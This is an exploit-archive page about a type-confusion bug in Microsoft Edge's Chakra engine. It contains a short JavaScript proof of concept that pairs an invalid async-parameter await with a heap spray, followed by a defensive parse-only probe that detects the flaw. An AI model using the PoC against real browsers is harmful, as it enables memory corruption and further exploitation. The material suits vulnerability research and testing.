Microsoft Edge Chakra JIT parameter scope parsing type confusion Vulnerability / Exploit
Exploits / Vulnerability Discovered : 2018-08-17 |
Type : dos |
Platform : windows
This exploit / vulnerability Microsoft Edge Chakra JIT parameter scope parsing type confusion is for educational purposes only and if it is used you will do so at your own risk!
[+] Code ...
// PoC:
// An `await` inside the computed property name of a class expression that sits in
// the default-parameter scope of an async function is an early SyntaxError per the
// ECMAScript spec, but Chakra's parser accepts it and emits bytecode for it.
async function trigger(a = class b {
[await 1]() {
}
}) {
}
// Spray the heap with bound-function objects before triggering the confused resume.
let spray = [];
for (let i = 0; i < 100000; i++) {
spray.push(parseFloat.bind(1, 0x1234, 0x1234, 0x1234, 0x1234));
}
trigger();
/*
The PoC is invalid JavaScript, but Chakra does parse it without any exception and generates incorrect bytecode from that.
Yield operations should not be performed under a try-catch block, but incorrectly generated bytecode allowed it at (a). This will lead to type confusion in the InterpreterStackFrame::OP_ResumeYield method.
*/
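The bug hinges on the parser accepting a construct the spec defines as an early error. The following probe, added here and not part of the original PoC, compiles the page's construct (plus a valid and an invalid control) with `new Function`, which parses but never executes, so it reports whether the engine under test raises the required SyntaxError before any bytecode is generated. The probe names and the `expectReject` flags are this example's own.

```javascript
// Parser-conformance probe for "await in the parameter scope of an async function".
// Per spec, FormalParameters of an async function must not Contain an AwaitExpression,
// and that check reaches into computed property keys of a class expression used as a
// default value. A conforming engine therefore rejects the PoC's construct at parse time.

const PROBES = [
  // Valid control: a default parameter with no await.
  { name: "default-param-no-await",
    src: "async function f(a = 1) {}", expectReject: false },
  // Plain await in a default parameter: always an early SyntaxError.
  { name: "await-in-default-param",
    src: "async function f(a = await 1) {}", expectReject: true },
  // The construct from the PoC above: await in a class computed key inside a default parameter.
  { name: "await-in-class-computed-key",
    src: "async function f(a = class b { [await 1]() {} }) {}", expectReject: true },
];

// Parse a source string without running it; report whether parsing was rejected.
function probe(src) {
  try {
    new Function(src); // compiles the wrapper; the body is never invoked
    return { rejected: false, error: null };
  } catch (e) {
    return { rejected: true, error: e.name };
  }
}

// Run every probe and flag mismatches between observed and spec-required behaviour.
function runProbes(probes = PROBES) {
  return probes.map((p) => {
    const r = probe(p.src);
    const ok = r.rejected === p.expectReject && (!r.rejected || r.error === "SyntaxError");
    return { name: p.name, rejected: r.rejected, error: r.error, ok };
  });
}

// True only if the engine handles all probes exactly as the spec requires.
function engineConforms(probes = PROBES) {
  return runProbes(probes).every((r) => r.ok);
}

if (typeof require !== "undefined" && require.main === module) {
  for (const r of runProbes()) {
    console.log(`${r.ok ? "PASS" : "FAIL"} ${r.name}: rejected=${r.rejected} error=${r.error}`);
  }
  console.log(engineConforms() ? "engine conforms" : "engine accepts invalid parameter-scope await");
}
```

A FAIL on the third probe is the signature of the parser defect this page describes; run the same file under each engine you need to assess.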